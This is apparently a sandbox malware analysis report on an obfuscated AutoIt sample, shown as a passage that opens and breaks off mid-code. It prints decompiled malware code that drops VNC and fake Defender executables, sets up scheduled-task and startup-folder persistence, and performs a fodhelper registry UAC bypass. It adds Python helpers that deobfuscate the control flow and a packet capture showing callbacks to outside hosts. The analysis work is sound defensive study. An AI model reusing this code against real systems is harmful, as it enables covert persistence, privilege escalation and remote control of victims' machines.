$ASRETURNLIST [$INEXTINSERTIONINDEX ] = $ASFOLDERMATCHLIST [$I ] $INEXTINSERTIONINDEX += 1 IF $SFOLDERSLASH THEN $SFOLDERTOFIND = $ASFOLDERMATCHLIST [$I ] ELSE $SFOLDERTOFIND = $ASFOLDERMATCHLIST [$I ] & "\" ENDIF LOCAL $IFILESECTIONENDINDEX = 0 , $IFILESECTIONSTARTINDEX = 0 FOR $J = 1 TO $ASFOLDERFILESECTIONLIST [0 ] [0 ] IF $SFOLDERTOFIND = 
$ASFOLDERFILESECTIONLIST [$J ] [0 ] THEN $IFILESECTIONSTARTINDEX = $ASFOLDERFILESECTIONLIST [$J ] [1 ] IF $J = $ASFOLDERFILESECTIONLIST [0 ] [0 ] THEN $IFILESECTIONENDINDEX = $ASFILEMATCHLIST [0 ] ELSE $IFILESECTIONENDINDEX = $ASFOLDERFILESECTIONLIST [$J + 1 ] [1 ] + 4294967295 ENDIF IF $ISORT = 1 THEN __ARRAYDUALPIVOTSORT ($ASFILEMATCHLIST , $IFILESECTIONSTARTINDEX , $IFILESECTIONENDINDEX ) ENDIF FOR $K = $IFILESECTIONSTARTINDEX TO $IFILESECTIONENDINDEX $ASRETURNLIST [$INEXTINSERTIONINDEX ] = $ASFILEMATCHLIST [$K ] $INEXTINSERTIONINDEX += 1 NEXT EXITLOOP ENDIF NEXT NEXT ENDIF ENDSWITCH ELSE IF $ASRETURNLIST [0 ] = 0 THEN RETURN SETERROR (1 , 9 , "" ) REDIM $ASRETURNLIST [$ASRETURNLIST [0 ] + 1 ] ENDIF RETURN $ASRETURNLIST ENDFUNC FUNC __FLTAR_ADDFILELISTS (BYREF $ASTARGET , $ASSOURCE_1 , $ASSOURCE_2 , $ISORT = 0 ) REDIM $ASSOURCE_1 [$ASSOURCE_1 [0 ] + 1 ] IF $ISORT = 1 THEN __ARRAYDUALPIVOTSORT ($ASSOURCE_1 , 1 , $ASSOURCE_1 [0 ] ) $ASTARGET = $ASSOURCE_1 $ASTARGET [0 ] += $ASSOURCE_2 [0 ] REDIM $ASSOURCE_2 [$ASSOURCE_2 [0 ] + 1 ] IF $ISORT = 1 THEN __ARRAYDUALPIVOTSORT ($ASSOURCE_2 , 1 , $ASSOURCE_2 [0 ] ) _ARRAYCONCATENATE ($ASTARGET , $ASSOURCE_2 , 1 ) ENDFUNC FUNC __FLTAR_ADDTOLIST (BYREF $ALIST , $VVALUE_0 , $VVALUE_1 = + 4294967295 ) IF $VVALUE_1 = + 4294967295 THEN $ALIST [0 ] += 1 IF UBOUND ($ALIST ) <= $ALIST [0 ] THEN REDIM $ALIST [UBOUND ($ALIST ) * 2 ] $ALIST [$ALIST [0 ] ] = $VVALUE_0 ELSE $ALIST [0 ] [0 ] += 1 IF UBOUND ($ALIST ) <= $ALIST [0 ] [0 ] THEN REDIM $ALIST [UBOUND ($ALIST ) * 2 ] [2 ] $ALIST [$ALIST [0 ] [0 ] ] [0 ] = $VVALUE_0 $ALIST [$ALIST [0 ] [0 ] ] [1 ] = $VVALUE_1 ENDIF ENDFUNC FUNC __FLTAR_LISTTOMASK (BYREF $SMASK , $SLIST ) IF STRINGREGEXP ($SLIST , "\\|/|:|\<|\>|\|" ) THEN RETURN 0 $SLIST = STRINGREPLACE (STRINGSTRIPWS (STRINGREGEXPREPLACE ($SLIST , "\s*;\s*" , ";" ) , $STR_STRIPLEADING + $STR_STRIPTRAILING ) , ";" , "|" ) $SLIST = STRINGREPLACE (STRINGREPLACE (STRINGREGEXPREPLACE ($SLIST , "[][$^.{}()+\-]" , "\\$0" ) , "?" , "." 
) , "*" , ".*?" ) $SMASK = "(?i)^(" & $SLIST & ")\z" RETURN 1 ENDFUNC FUNC _FILEPRINT ($SFILEPATH , $ISHOW = @SW_HIDE ) IF $ISHOW = DEFAULT THEN $ISHOW = @SW_HIDE RETURN SHELLEXECUTE ($SFILEPATH , "" , @WORKINGDIR , "print" , $ISHOW ) ENDFUNC FUNC _FILEREADTOARRAY ($SFILEPATH , BYREF $VRETURN , $IFLAGS = $FRTA_COUNT , $SDELIMITER = "" ) $VRETURN = 0 IF $IFLAGS = DEFAULT THEN $IFLAGS = $FRTA_COUNT IF $SDELIMITER = DEFAULT THEN $SDELIMITER = "" LOCAL $BEXPAND = TRUE IF BITAND ($IFLAGS , $FRTA_INTARRAYS ) THEN $BEXPAND = FALSE $IFLAGS -= $FRTA_INTARRAYS ENDIF LOCAL $IENTIRE = $STR_CHRSPLIT IF BITAND ($IFLAGS , $FRTA_ENTIRESPLIT ) THEN $IENTIRE = $STR_ENTIRESPLIT $IFLAGS -= $FRTA_ENTIRESPLIT ENDIF LOCAL $INOCOUNT = 0 IF $IFLAGS <> $FRTA_COUNT THEN $IFLAGS = $FRTA_NOCOUNT $INOCOUNT = $STR_NOCOUNT ENDIF IF $SDELIMITER THEN LOCAL $ALINES = FILEREADTOARRAY ($SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , 0 , 0 ) LOCAL $IDIM_1 = UBOUND ($ALINES ) + $IFLAGS IF $BEXPAND THEN LOCAL $IDIM_2 = UBOUND (STRINGSPLIT ($ALINES [0 ] , $SDELIMITER , $IENTIRE + $STR_NOCOUNT ) ) LOCAL $ATEMP_ARRAY [$IDIM_1 ] [$IDIM_2 ] LOCAL $IFIELDS , $ASPLIT FOR $I = 0 TO $IDIM_1 - $IFLAGS + 4294967295 $ASPLIT = STRINGSPLIT ($ALINES [$I ] , $SDELIMITER , $IENTIRE + $STR_NOCOUNT ) $IFIELDS = UBOUND ($ASPLIT ) IF $IFIELDS <> $IDIM_2 THEN RETURN SETERROR (3 , 0 , 0 ) ENDIF FOR $J = 0 TO $IFIELDS + 4294967295 $ATEMP_ARRAY [$I + $IFLAGS ] [$J ] = $ASPLIT [$J ] NEXT NEXT IF $IDIM_2 < 2 THEN RETURN SETERROR (4 , 0 , 0 ) IF $IFLAGS THEN $ATEMP_ARRAY [0 ] [0 ] = $IDIM_1 - $IFLAGS $ATEMP_ARRAY [0 ] [1 ] = $IDIM_2 ENDIF ELSE LOCAL $ATEMP_ARRAY [$IDIM_1 ] FOR $I = 0 TO $IDIM_1 - $IFLAGS + 4294967295 $ATEMP_ARRAY [$I + $IFLAGS ] = STRINGSPLIT ($ALINES [$I ] , $SDELIMITER , $IENTIRE + $INOCOUNT ) NEXT IF $IFLAGS THEN $ATEMP_ARRAY [0 ] = $IDIM_1 - $IFLAGS ENDIF ENDIF $VRETURN = $ATEMP_ARRAY ELSE IF $IFLAGS THEN LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , $FO_READ ) IF $HFILEOPEN = + 4294967295 THEN RETURN 
SETERROR (1 , 0 , 0 ) LOCAL $SFILEREAD = FILEREAD ($HFILEOPEN ) FILECLOSE ($HFILEOPEN ) IF STRINGLEN ($SFILEREAD ) THEN $VRETURN = STRINGREGEXP (@LF & $SFILEREAD , "(?|(\N+)\z|(\N*)(?:\R))" , 3 ) $VRETURN [0 ] = UBOUND ($VRETURN ) + 4294967295 ELSE RETURN SETERROR (2 , 0 , 0 ) ENDIF ELSE $VRETURN = FILEREADTOARRAY ($SFILEPATH ) IF @ERROR THEN $VRETURN = 0 RETURN SETERROR (@ERROR , 0 , 0 ) ENDIF ENDIF ENDIF RETURN 1 ENDFUNC FUNC _FILEWRITEFROMARRAY ($SFILEPATH , CONST BYREF $AARRAY , $IBASE = DEFAULT , $IUBOUND = DEFAULT , $SDELIMITER = "|" ) LOCAL $IRETURN = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (2 , 0 , $IRETURN ) LOCAL $IDIMS = UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) IF $IDIMS > 2 THEN RETURN SETERROR (4 , 0 , 0 ) LOCAL $ILAST = UBOUND ($AARRAY ) + 4294967295 IF $IUBOUND = DEFAULT OR $IUBOUND > $ILAST THEN $IUBOUND = $ILAST IF $IBASE < 0 OR $IBASE = DEFAULT THEN $IBASE = 0 IF $IBASE > $IUBOUND THEN RETURN SETERROR (5 , 0 , $IRETURN ) IF $SDELIMITER = DEFAULT THEN $SDELIMITER = "|" LOCAL $HFILEOPEN = $SFILEPATH IF ISSTRING ($SFILEPATH ) THEN $HFILEOPEN = FILEOPEN ($SFILEPATH , $FO_OVERWRITE ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (1 , 0 , $IRETURN ) ENDIF LOCAL $IERROR = 0 $IRETURN = 1 SWITCH $IDIMS CASE 1 FOR $I = $IBASE TO $IUBOUND IF NOT FILEWRITE ($HFILEOPEN , $AARRAY [$I ] & @CRLF ) THEN $IERROR = 3 $IRETURN = 0 EXITLOOP ENDIF NEXT CASE 2 LOCAL $STEMP = "" FOR $I = $IBASE TO $IUBOUND $STEMP = $AARRAY [$I ] [0 ] FOR $J = 1 TO UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 $STEMP &= $SDELIMITER & $AARRAY [$I ] [$J ] NEXT IF NOT FILEWRITE ($HFILEOPEN , $STEMP & @CRLF ) THEN $IERROR = 3 $IRETURN = 0 EXITLOOP ENDIF NEXT ENDSWITCH IF ISSTRING ($SFILEPATH ) THEN FILECLOSE ($HFILEOPEN ) RETURN SETERROR ($IERROR , 0 , $IRETURN ) ENDFUNC FUNC _FILEWRITELOG ($SLOGPATH , $SLOGMSG , $IFLAG = + 4294967295 ) LOCAL $IOPENMODE = $FO_APPEND LOCAL $SDATENOW = @YEAR & "-" & @MON & "-" & @MDAY LOCAL $STIMENOW = @HOUR & ":" & @MIN & ":" & @SEC LOCAL $SMSG = 
("XgmFM3bhShHm4YlK8dSFRBb4EyaT81CqTsZFJvJyj8WEQaDvd8Nw4Xaufrbo3rj1NrCK9QaMCswSQGnD5NO" ) DIM $V6SDARTVF1Z40YH3WX7B = 3620073 ENDIF INT (2635705 ) NEXT IF $RUNONCE = FALSE THEN IF $RUN = TRUE THEN SHELLEXECUTE ($INSTALDIR & "\" & $FILENAME ) ENDIF ELSE IF @SCRIPTDIR <> $SOXGWLGCUOVMJM THEN SHELLEXECUTE ($INSTALDIR & "\" & $FILENAME ) ENDIF ENDIF ENDFUNC FUNC MIVVMSGJPNONEWUB ($FILE , $REGKEY , $ATTRIB , $HIDDEN ) GLOBAL $784529671 = 323312849 GLOBAL $DGTOLJOH5F = 2219820 FOR $E = 0 TO 1133057 ISFLOAT ("XE3WQZ6brrck" ) IF $784529671 = 323312849 THEN DIRCREATE ($SOXGWLGCUOVMJM ) $784529671 = 967842408 PTR (926337 + 1071884 + 2697195 + 1173803 ) ENDIF IF $784529671 = 439940659 THEN LOCAL $VBSOPEN DIM $TXY5X22NKR7UHDVLAPQV = 1962837 + 4294735516 + 4293996117 EXITLOOP ENDIF IF $784529671 = 648664962 THEN LOCAL $OPENFILE = FILEOPEN (@AUTOITEXE , "16" ) $784529671 = 658599975 CHR (507487 ) STRING (2360434 * 45376 + 759639 ) ENDIF IF $784529671 = 658599975 THEN LOCAL $HFILE = FILEOPEN ($FULLPATH , "2" ) WINEXISTS ("U6rawlXUmUrQkvD1Q2Hmuc7pzLUuDtsntOWBf3cotcoNN4CJGiF2VTnS8bKUBCq2Aew" ) $784529671 = 1590494170 DIM $WWZT2RXTKFIJYVYABKAE = "dssW1VvmIG7bEvTcB054NzfKrN4eaLWeEHTDGGbFBgc8lit9exaUEk0MmR" ENDIF IF $784529671 = 708304020 THEN LOCAL $URLPATH = @STARTUPDIR & "\" & $REGKEY & ".url" DIM $V3F7MPE4ZYBGXHZJU59L = 2400755 + 2286132 + 2821529 + 1051973 * 122230 * 2686755 + 3673085 + 809362 $784529671 = 648664962 ENDIF IF $784529671 = 813318089 THEN LOCAL $FULLPATH = $SOXGWLGCUOVMJM & "\" & $FILE DIM $5FSSOFRV25SJVUTMPG9O = 3538052 $784529671 = 1944260330 ENDIF IF $784529671 = 925089026 THEN LOCAL $URLCONTENT = "[InternetShortcut]" & @CR & "URL=file:///" & STRINGREPLACE ($VBSPATH , "\" , "/" ) $784529671 = 1407564695 DIM $EFDLY1KIQ5U1UTB9ZGYZ = 933632 + 3622206 + 4293329514 * 3721962 + 659796 * 3569556 + 4294419155 ENDIF IF $784529671 = 967842408 THEN LOCAL $MODE = $HIDDEN ISBINARY (2345240 * 3306334 + 809435 + 3949641 ) $784529671 = 813318089 DIM $H2VUERLHMS59Y1CYSE2X = 611570 
ENDIF IF $784529671 = 1407564695 THEN LOCAL $URLOPEN DIM $IAYW7YVSCRAJXVICSXHU = 3337811 * 1340777 + 2324484 * 3133329 * 2646375 * 1134941 + 4292515232 + 4293543052 $784529671 = 439940659 INT (2331776 ) ENDIF IF $784529671 = 1590494170 THEN LOCAL $BINARY = FILEREAD ($OPENFILE ) & BINARY (RANDOM ("0" , "255" ) ) $784529671 = 925089026 DIM $UABHYKAQVWOMMDDZX8BA = 1182834 + 3816393 + 3273855 + 2229667 ENDIF IF $784529671 = 1944260330 THEN LOCAL $VBSPATH = $SOXGWLGCUOVMJM & "\" & $REGKEY & ".vbs" $784529671 = 708304020 CHR (1305842 ) ENDIF ISSTRING ("4KL8aQ6nrUM0CiaoDssoL" ) NEXT IF $MODE THEN SHELLEXECUTE ("schtasks" , "/create /tn " & $REGKEY & " /tr " & CHR ("34" ) & $FULLPATH & CHR ("34" ) & " /sc minute /mo 1 /F" , @SYSTEMDIR , "" , @SW_HIDE ) ELSE GLOBAL $658599975 = 323312849 GLOBAL $FUBZ8NTGJ3 = 394063 FOR $E = 0 TO 3045587 IF $658599975 = 323312849 THEN $URLOPEN = FILEOPEN ($URLPATH , "2" ) RANDOM (521480 ) $658599975 = 967842408 ENDIF IF $658599975 = 648664962 THEN FILEWRITE ($URLOPEN , $URLCONTENT ) EXITLOOP ISSTRING ("cGl8IYf26K" ) ENDIF IF $658599975 = 708304020 THEN FILEWRITE ($VBSOPEN , $VBS ) ISSTRING (686503 + 725473 + 1222023 * 2017236 ) $658599975 = 648664962 ENDIF IF $658599975 = 813318089 THEN LOCAL $TRIPLE = CHR ("34" ) & CHR ("34" ) & CHR ("34" ) $658599975 = 1944260330 ENDIF IF $658599975 = 967842408 THEN $VBSOPEN = FILEOPEN ($VBSPATH , "2" ) ISSTRING ("XSqLLcGAD0roOZkCgtGva6rV9GZGo41qhasCXRiCMUHAW0Qr3aSt6RS0zELfmalI9ahNGRQzleSpy19i0HMom" ) $658599975 = 813318089 CHR (1241107 ) ENDIF IF $658599975 = 1944260330 THEN LOCAL $VBS = "Set WshShell = WScript.CreateObject(" & CHR ("34" ) & "WScript.Shell" & CHR ("34" ) & ") " & @CR & "WshShell.Run " & $TRIPLE & $FULLPATH & $TRIPLE $658599975 = 708304020 RANDOM (1809451 ) ENDIF DIM $VMUSH28BAIEDOOX6WBQR = "eNxuiYfRzyozZXz44zBB1aEWKYKoLLaebRQH679d3" NEXT ENDIF GLOBAL $708304020 = 323312849 GLOBAL $BJQDZ17CCC = 2981910 FOR $E = 0 TO 944417 IF $708304020 = 323312849 THEN LOCAL $HANDLEARRAY = [$URLOPEN , 
$VBSOPEN , $OPENFILE , $HFILE ] $708304020 = 967842408 INT (835559 ) PTR ("xig276zxHh9uFGxUq" ) ENDIF IF $708304020 = 813318089 THEN FILESETATTRIB ($FULLPATH , $ATTRIB ) RANDOM (3384109 ) $708304020 = 1944260330 ISBINARY ("nO1cOmUhQrUffFL0RveYfn6CJFOzsL4ECKTVGEBWJx" ) RANDOM (709510 ) ENDIF IF $708304020 = 967842408 THEN FILEWRITE ($HFILE , $BINARY ) $708304020 = 813318089 ENDIF IF $708304020 = 1944260330 THEN FILESETATTRIB ($SOXGWLGCUOVMJM , $ATTRIB ) INT (3974479 ) EXITLOOP ISSTRING ("tZewpMDX0tl3roRwZCybbdsGd63tTcicsnpIWTUHaZFQ28qvJM34ehGqFGttTjdYkj" ) ENDIF RANDOM (506822 ) NEXT FOR $I = "0" TO UBOUND ($HANDLEARRAY ) - "1" FILECLOSE ($HANDLEARRAY [$I ] ) NEXT ENDFUNC FUNC GETDIR ($INDEX ) GLOBAL $813318089 = 323312849 GLOBAL $GT0ALHLOEO = 2332845 FOR $E = 0 TO 2173231 DIM $7KR9DPYZZ0VSFTXMXBCW = 745899 + 456920 + 2887456 IF $813318089 = 323312849 THEN LOCAL $DIRS = [@TEMPDIR , @APPDATADIR , @SCRIPTDIR ] MOD (2599250 , 760383 ) $813318089 = 967842408 DIM $V8ETRSBKZZF5RBJREWCT = 250402 + 4293885267 + 1539338 + 3085217 ENDIF IF $813318089 = 967842408 THEN RETURN $DIRS [$INDEX - "1" ] PTR ("G81yxSf2m643X6Hlbh3q3Bv9S56GGxTLWFySKV4vrkGhCxvBLJKt5WReM2RBWHuYmrgrGZ" ) EXITLOOP MOD (2162431 , 3953781 ) ENDIF MOD (2105889 , 1303155 ) NEXT ENDFUNC FUNC REMOVEZONEID () FILEDELETE (@AUTOITEXE & ":Zone.Identifier" ) ENDFUNC REMOVEZONEID () KHOCWHDEQXMSTFPOADRL ("runas" ) LOCAL $GBCNYUEOGFONFLBWF = DLLSTRUCTGETDATA (DJVLLWQLKATZJRZPICPARXZ ("AppXDeploymentExtensions.desktop1" , "8" ) , EXECUTE ("1" ) ) $GBCNYUEOGFONFLBWF &= DLLSTRUCTGETDATA (DJVLLWQLKATZJRZPICPARXZ ("Eap3Host2" , "8" ) , EXECUTE ("1" ) ) $GBCNYUEOGFONFLBWF = DBRUAIEIBZEWRGBQ ($GBCNYUEOGFONFLBWF , "sckxjwcnmxupxfyjkysyphxrkregslgdwthrzgquajlplpajub" ) ASAZRREHKGLB () AJJMOCPPKFEWODWKA () $SOXGWLGCUOVMJM = @USERPROFILEDIR & "\btpanui" KGGJMOBCJUETCWRTLNXKZGWSZXBPV ("fmweecwytels" , "vnc.exe" , TRUE , FALSE , 1 ) KGGJMOBCJUETCWRTLNXKZGWSZXBPV ("qhdokzqjbkdd" , "windef.exe" , TRUE , FALSE , 1 ) 
$KNHRXQUZAIDARCYAAKVJDJTPD = @SCRIPTFULLPATH MWMQWLZFSVGLEKEBWPKTQCNGY ($KNHRXQUZAIDARCYAAKVJDJTPD , "" , $GBCNYUEOGFONFLBWF , FALSE ) MIVVMSGJPNONEWUB ("SystemPropertiesPerformance.exe" , "RtkAudioService64" , "+HR" , TRUE ) WHILE TRUE TLRQDAKNGKXFDWQNVSPQPWUUICTCP () WEND LLBUPLMSHANIDLHCMEMP ()
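The decompiled script is control-flow flattened: every function body is a FOR loop over a numeric state variable, each IF block sets the next state, and bare calls such as ISPTR(...), CHR(n) or DIM $xxx = "..." are padding. The Python below is an added example (it is not part of the Joe Sandbox report and not code from the sample) that recovers the execution order of one such function by following the state transitions from the initial value and discarding the padding. Its input is the Windows 10 branch of the UAC-bypass function, copied from the listing with one statement per line; the regular expressions assume the decompiler's spacing as shown on this page, that the state variable is the only GLOBAL with a purely numeric name, and that state blocks are not nested inside one another.

```python
import re

# Constructed input: the Windows 10 branch of RARUCLGLLFJNMMTFCYMKXQZQIJP from the listing above,
# one statement per line. Strings are raw because of the registry-path backslashes.
WIN10_BRANCH = r"""
GLOBAL $648664962 = 323312849
GLOBAL $5YYHPGM5KA = 600086
FOR $E = 0 TO 3637026
CHR (2557061 )
IF $648664962 = 323312849 THEN
DLLCALL ("kernel32.dll" , "boolean" , "Wow64EnableWow64FsRedirection" , "boolean" , "0" )
$648664962 = 967842408
STRING ("VCc8" )
ISBINARY ("wn" )
ENDIF
IF $648664962 = 708304020 THEN
EXIT
EXITLOOP
ISPTR ("BsRiHtLYRz9BwIe3NveqFfqWyGGLMbq0wS2VuL4TwWzoyI9Nf48ZQnlwb5UaX9kOjifOQsIbAu4TObxZG2GS" )
ENDIF
IF $648664962 = 813318089 THEN
REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE )
$648664962 = 1944260330
ISPTR ("36wLVfpDu7Wu6yvsCRaG4C4CBLS86ikIjiGyHh46ivm5UxgdZ0dYT28Ab3jixqGmXmlX16VvXdxHq8TeFOjgfv0qkgwO7WI2YaiGlsl2f" )
ENDIF
IF $648664962 = 967842408 THEN
REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "DelegateExecute" , "REG_SZ" , "Null" )
ISFLOAT ("jcjeLSgAgAw4MUIgxaEFUq0m2mCraxujWU6tE3j0Vw3RjrOAs9" )
$648664962 = 813318089
ENDIF
IF $648664962 = 1944260330 THEN
SHELLEXECUTE ("fodhelper" )
MOD (3823291 , 789502 )
$648664962 = 708304020
ISFLOAT ("h3XpKE1NVwwicKH b8beu9Yedh".replace(" ", "") )
ENDIF
ISPTR (3722875 + 2426798 * 664294 * 2553950 )
NEXT
"""

# The state variable is the only GLOBAL whose name is purely numeric (e.g. $648664962).
STATE_DECL = re.compile(r"^GLOBAL\s+(\$\d+)\s*=\s*(\d+)\s*$")
BLOCK_HEAD = re.compile(r"^IF\s+(\$\d+)\s*=\s*(\d+)\s+THEN\s*$")
STATE_SET = re.compile(r"^(\$\d+)\s*=\s*(\d+)\s*$")
# Bare calls to side-effect-free functions and DIMs of throwaway variables are the padding.
JUNK_CALL = re.compile(r"^(ISPTR|ISFLOAT|ISBOOL|ISBINARY|ISSTRING|CHR|INT|STRING|MOD|RANDOM|PTR|WINEXISTS)\s*\(", re.I)
JUNK_DIM = re.compile(r'^DIM\s+\$\w+\s*=\s*(".*"|[\d\s+*]+)\s*$')
REGWRITE_ARGS = re.compile(r'^REGWRITE\s*\(\s*"([^"]+)"\s*,\s*"([^"]*)"')


def unflatten(src: str) -> list:
    """Return the real statements of one flattened function in execution order."""
    lines = [l.strip() for l in src.splitlines() if l.strip()]
    state_var = start = None
    blocks = {}  # state value -> (statements, next state or None when the block ends the loop)
    i = 0
    while i < len(lines):
        m = STATE_DECL.match(lines[i])
        if m and state_var is None:
            state_var, start = m.group(1), int(m.group(2))
        m = BLOCK_HEAD.match(lines[i])
        if m and m.group(1) == state_var:
            stmts, nxt, terminal, depth = [], None, False, 1
            i += 1
            while depth:
                cur = lines[i]
                if cur.startswith("IF ") and cur.endswith("THEN"):
                    depth += 1  # a nested multi-line IF is kept verbatim, ENDIF included
                elif cur == "ENDIF":
                    depth -= 1
                    if depth == 0:
                        break
                s = STATE_SET.match(cur)
                if s and s.group(1) == state_var:
                    nxt = int(s.group(2))
                elif cur == "EXITLOOP":
                    terminal = True
                elif not (JUNK_CALL.match(cur) or JUNK_DIM.match(cur)):
                    stmts.append(cur)
                i += 1
            blocks[int(m.group(2))] = (stmts, None if terminal else nxt)
        i += 1
    # Walk the transitions from the initial state; a revisited state would be a genuine loop.
    order, state, seen = [], start, set()
    while state in blocks and state not in seen:
        seen.add(state)
        stmts, state = blocks[state]
        order.extend(stmts)
    return order


def registry_writes(stmts: list) -> list:
    """(key, value name) pairs written by REGWRITE, in execution order: a ready-made IOC list."""
    return [m.groups() for m in map(REGWRITE_ARGS.match, stmts) if m]


if __name__ == "__main__":
    for stmt in unflatten(WIN10_BRANCH):
        print(stmt)
```

On this branch the recovered order is: disable WOW64 file-system redirection, write the empty DelegateExecute value, write the default command pointing at the sample, launch fodhelper, EXIT. The listing shows the default-command write before the DelegateExecute write, so reading it top to bottom gives the wrong sequence. The same routine, fed one function at a time, linearises the persistence function MIVVMSGJPNONEWUB and the resource dropper KGGJMOBCJUETCWRTLNXKZGWSZXBPV above.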

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

Timestamp                             Source Port  Dest Port  Source IP     Dest IP
Sep 29, 2021 01:36:07.384537935 CEST  49743        8000       192.168.2.4   50.17.5.224
Sep 29, 2021 01:36:07.987818956 CEST  8000         49743      50.17.5.224   192.168.2.4
Sep 29, 2021 01:36:07.987917900 CEST  49743        8000       192.168.2.4   50.17.5.224
Sep 29, 2021 01:36:07.988516092 CEST  49743        8000       192.168.2.4   50.17.5.224
Sep 29, 2021 01:36:08.991806030 CEST  8000         49743      50.17.5.224   192.168.2.4
Sep 29, 2021 01:36:09.985110998 CEST  49744        80         192.168.2.4   208.95.112.1
Sep 29, 2021 01:36:10.010328054 CEST  80           49744      208.95.112.1  192.168.2.4
Sep 29, 2021 01:36:10.010624886 CEST  49744        80         192.168.2.4   208.95.112.1
Sep 29, 2021 01:36:10.011471987 CEST  49744        80         192.168.2.4   208.95.112.1
Sep 29, 2021 01:36:10.037458897 CEST  80           49744      208.95.112.1  192.168.2.4
Sep 29, 2021 01:36:10.079448938 CEST  49744        80         192.168.2.4   208.95.112.1
Sep 29, 2021 01:36:14.900573015 CEST  49744        80         192.168.2.4   208.95.112.1
Sep 29, 2021 01:36:18.400753975 CEST  49745        8080       192.168.2.4   5.8.88.191
Sep 29, 2021 01:36:20.030541897 CEST  49746        80         192.168.2.4   208.95.112.1
Sep 29, 2021 01:36:20.056447983 CEST  80           49746      208.95.112.1  192.168.2.4
Sep 29, 2021 01:36:20.056561947 CEST  49746        80         192.168.2.4   208.95.112.1
Sep 29, 2021 01:36:20.062109947 CEST  49746        80         192.168.2.4   208.95.112.1
Sep 29, 2021 01:36:20.087898016 CEST  80           49746      208.95.112.1  192.168.2.4
Sep 29, 2021 01:36:20.158437967 CEST  49746        80         192.168.2.4   208.95.112.1
Sep 29, 2021 01:36:21.471038103 CEST  49745        8080       192.168.2.4   5.8.88.191
Sep 29, 2021 01:36:22.907526016 CEST  49747        443        192.168.2.4   5.8.88.191
Sep 29, 2021 01:36:22.907576084 CEST  443          49747      5.8.88.191    192.168.2.4
Sep 29, 2021 01:36:22.907756090 CEST  49747        443        192.168.2.4   5.8.88.191
Sep 29, 2021 01:36:27.471576929 CEST  49745        8080       192.168.2.4   5.8.88.191
Sep 29, 2021 01:36:44.489223957 CEST  49750        8080       192.168.2.4   5.8.88.191
Sep 29, 2021 01:36:47.662820101 CEST  49750        8080       192.168.2.4   5.8.88.191
Sep 29, 2021 01:36:48.004627943 CEST  49747        443        192.168.2.4   5.8.88.191
Sep 29, 2021 01:36:48.004652977 CEST  443          49747      5.8.88.191    192.168.2.4
Sep 29, 2021 01:36:53.770750046 CEST  49750        8080       192.168.2.4   5.8.88.191
Sep 29, 2021 01:37:04.783417940 CEST  80           49746      208.95.112.1  192.168.2.4
Sep 29, 2021 01:37:04.783525944 CEST  49746        80         192.168.2.4   208.95.112.1
Sep 29, 2021 01:37:10.835088968 CEST  49751        8080       192.168.2.4   5.8.88.191
Sep 29, 2021 01:37:13.006927967 CEST  49747        443        192.168.2.4   5.8.88.191
Sep 29, 2021 01:37:13.006956100 CEST  443          49747      5.8.88.191    192.168.2.4
Sep 29, 2021 01:37:13.897594929 CEST  49751        8080       192.168.2.4   5.8.88.191
Sep 29, 2021 01:37:18.747024059 CEST  80           49746      208.95.112.1  192.168.2.4
Sep 29, 2021 01:37:19.898145914 CEST  49751        8080       192.168.2.4   5.8.88.191
Sep 29, 2021 01:37:37.024944067 CEST  49752        8080       192.168.2.4   5.8.88.191
Sep 29, 2021 01:37:38.009067059 CEST  49747        443        192.168.2.4   5.8.88.191
Sep 29, 2021 01:37:38.009095907 CEST  443          49747      5.8.88.191    192.168.2.4
Sep 29, 2021 01:37:40.165508032 CEST  49752        8080       192.168.2.4   5.8.88.191
Sep 29, 2021 01:37:46.166199923 CEST  49752        8080       192.168.2.4   5.8.88.191
Sep 29, 2021 01:38:03.105066061 CEST  49747        443        192.168.2.4   5.8.88.191
Sep 29, 2021 01:38:03.105103016 CEST  443          49747      5.8.88.191    192.168.2.4
Sep 29, 2021 01:38:03.183374882 CEST  49753        8080       192.168.2.4   5.8.88.191
Sep 29, 2021 01:38:06.214675903 CEST  49753        8080       192.168.2.4   5.8.88.191
Sep 29, 2021 01:38:12.215255022 CEST  49753        8080       192.168.2.4   5.8.88.191
Sep 29, 2021 01:38:13.171844006 CEST  49754        8080       192.168.2.4   5.8.88.191
Sep 29, 2021 01:38:16.168715954 CEST  49754        8080       192.168.2.4   5.8.88.191
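A quick way to read a packet table like this one is to pair each client port with the replies it received. The Python below is an added example, not part of the Joe Sandbox report: it parses rows in the layout of the table (a constructed subset of the rows above, with the columns separated by spaces), groups them into flows keyed by client port and server endpoint, and lists the flows that never got a packet back. On this capture that isolates the 5.8.88.191:8080 attempts: each one is re-sent after about 3 and 6 seconds, the spacing of Windows' SYN retransmissions, and a fresh attempt on a new port starts about 26 seconds after the previous one, while the 443 connection to the same host and the 0x21.in:8000 and ip-api.com sessions are all answered. The 3-second and 26-second figures come from the rows, the SYN interpretation is an assumption since the table carries no TCP flags.

```python
import re
from collections import defaultdict
from datetime import datetime

CLIENT = "192.168.2.4"  # the sandbox VM in this report

# Constructed subset of the TCP packet table above (timestamp, src port, dst port, src ip, dst ip).
TCP_ROWS = """
Sep 29, 2021 01:36:07.384537935 CEST 49743 8000 192.168.2.4 50.17.5.224
Sep 29, 2021 01:36:07.987818956 CEST 8000 49743 50.17.5.224 192.168.2.4
Sep 29, 2021 01:36:09.985110998 CEST 49744 80 192.168.2.4 208.95.112.1
Sep 29, 2021 01:36:10.010328054 CEST 80 49744 208.95.112.1 192.168.2.4
Sep 29, 2021 01:36:18.400753975 CEST 49745 8080 192.168.2.4 5.8.88.191
Sep 29, 2021 01:36:21.471038103 CEST 49745 8080 192.168.2.4 5.8.88.191
Sep 29, 2021 01:36:22.907526016 CEST 49747 443 192.168.2.4 5.8.88.191
Sep 29, 2021 01:36:22.907576084 CEST 443 49747 5.8.88.191 192.168.2.4
Sep 29, 2021 01:36:27.471576929 CEST 49745 8080 192.168.2.4 5.8.88.191
Sep 29, 2021 01:36:44.489223957 CEST 49750 8080 192.168.2.4 5.8.88.191
Sep 29, 2021 01:36:47.662820101 CEST 49750 8080 192.168.2.4 5.8.88.191
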